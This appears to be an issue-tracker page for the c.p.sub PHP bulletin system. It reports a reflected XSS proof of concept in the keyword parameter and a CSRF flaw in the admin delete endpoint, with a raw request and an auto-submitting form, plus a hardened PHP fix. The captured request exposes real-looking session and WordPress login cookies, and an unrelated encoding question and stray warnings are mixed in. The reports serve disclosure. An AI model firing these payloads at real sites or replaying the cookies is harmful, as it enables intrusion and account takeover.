cooltey / c.p.sub
PHP Bulletin System with CSV
Parameter value without rigorous filtration
File: Index.php
PoC Payload:
http://site/index.php?keyword=%22%3E%3Csvg/onload=alert(domain)%3E%22
Version: 5.2
The keyword parameter is not checked at the input or output points, so the injected code is triggered.
Resolution: filtering, encoding or escaping.
Hi,
Thanks for creating a super useful system.
Here is my question, shown below:
Everything works fine in English...
But when I use Chinese as the post title, the system does not record anything...
So I can only use English.
Simply put,
whenever I enter Chinese in the title or author field,
all of the Chinese text disappears from the bulletin board,
but English titles do not.
I am currently using free hosting.
Thanks, this system is great.
I'd like to ask for your help.
I don't know where the problem is.
Hey, C.P.Sub
In your backend admin "delete article" section, no token verification is produced, which causes CSRF, and the "get" parameter value is very dangerous.
List:
http://website/manage.php?p=article_list
PoC Payload:
GET /manage.php?p=article_del&id=ID HTTP/1.1
Host: your_website
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3497.100 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8
Referer: http://127.0.0.1/456/manage.php?p=article_list
Accept-Encoding: gzip, deflate
Accept-Language: zh-TW,zh;q=0.9,en-US;q=0.8,en;q=0.7
Cookie: wordpress_test_cookie=WP+Cookie+check; wordpress_logged_in_5c016e8f0f95f039102cbe8366c5c7f3=test%7C1537587372%7CgZf4275f8FC9rh5rffBvPrfPZwQBwSdtTLoKtW1JdQ6%7C4350d349b75ea62d1bbd963b4ee5460a95206b92a5df2dd7899ff7ccdc51bea3; wp-settings-1=mfold%3Do; wp-settings-time-1=1537414573; cerber_groove=49d7bce85e1b8082ab6d6cdf0854abc8; cerber_groove_x_Ad7onvqFrh3GYs8jQ1I24UyDpVRC=G0c9tWNuhQ4Z8azbyspmHrx7fYE5XM; _awtvW=Zqmk3E; gXSlbZOPaVqTWrR=%5DjCLPER7IhSHZkD; tUAnShmrCET=gLvmBVQPSwn; AJeZVoHYa=Gd3nvWzpe; PHPSESSID=hbdcrh6cj6jgl9v4jo5gedbcp6
Connection: close
PoC Payload:
<html>
<head>
<title>CSRF</title>
</head>
<body>
<script>history.pushState('', '', '/')</script>
<form action="http://website/manage.php">
<input type="hidden" name="p" value="article_del" />
<input type="hidden" name="id" value="2" />
<input type="submit" value="Hello" />
</form>
</body>
</html>
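A hardened version of the two handlers discussed in the reports above (the unescaped keyword output in index.php, and the token-less GET delete in manage.php?p=article_del), written here as an added example that is not taken from the c.p.sub project; render_keyword, csrf_token, verify_csrf, delete_form and delete_article are hypothetical names.

```php
<?php
// Added example (not c.p.sub project code); function and key names are hypothetical.
session_start();

// --- XSS report: the keyword parameter is echoed unescaped in index.php ---
function render_keyword(string $keyword): string {
    // Escape for an HTML context; ENT_QUOTES also covers attribute contexts
    // such as value="...", so a "><svg/onload=...> payload renders as literal text.
    return htmlspecialchars($keyword, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

// --- CSRF report: manage.php?p=article_del&id=ID deletes via a bare GET ---
function csrf_token(): string {
    // One random token per session, embedded in every state-changing form.
    if (empty($_SESSION['csrf_token'])) {
        $_SESSION['csrf_token'] = bin2hex(random_bytes(32));
    }
    return $_SESSION['csrf_token'];
}

function verify_csrf(array $post, string $method): bool {
    // Reject GET outright (a link or <img src> can never delete) and require
    // a matching token from the form body; hash_equals avoids timing leaks.
    if ($method !== 'POST' || empty($_SESSION['csrf_token'])) {
        return false;
    }
    $sent = (string)($post['csrf_token'] ?? '');
    return hash_equals($_SESSION['csrf_token'], $sent);
}

// Delete form as it would appear on manage.php?p=article_list
function delete_form(int $id): string {
    return '<form method="post" action="manage.php?p=article_del">'
         . '<input type="hidden" name="id" value="' . $id . '">'
         . '<input type="hidden" name="csrf_token" value="' . render_keyword(csrf_token()) . '">'
         . '<input type="submit" value="Delete">'
         . '</form>';
}

// Handler for p=article_del: method + token check, then strict id validation
if (($_GET['p'] ?? '') === 'article_del') {
    if (!verify_csrf($_POST, $_SERVER['REQUEST_METHOD'])) {
        http_response_code(403);
        exit('Invalid request');
    }
    $id = filter_var($_POST['id'] ?? '', FILTER_VALIDATE_INT);
    if ($id === false) { http_response_code(400); exit('Bad id'); }
    // delete_article($id); // project-specific deletion, assumed to exist
}
```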
You can see that after the parameters are obtained they are spliced directly into the instructions, and the relevant commands are also echoed; no rigorous filter check is performed, which caused the vulnerability:
Deprecated: Methods with the same name as their class will not be constructors in a future version of PHP; Settings has a deprecated constructor in \CPSub\class\settings.php on line 8
Deprecated: Methods with the same name as their class will not be constructors in a future version of PHP; Lib has a deprecated constructor in \WEB\CPSub\class\lib.php on line 8
Deprecated: Methods with the same name as their class will not be constructors in a future version of PHP; Article has a deprecated constructor in \WEB\CPSub\class\article.php on line 8
Deprecated: Methods with the same name as their class will not be constructors in a future version of PHP; Pager has a deprecated constructor in \WEB\CPSub\class\page.php on line 10
Deprecated: Methods with the same name as their class will not be constructors in a future version of PHP; Template has a deprecated constructor in \WEB\CPSub\class\template.php on line 8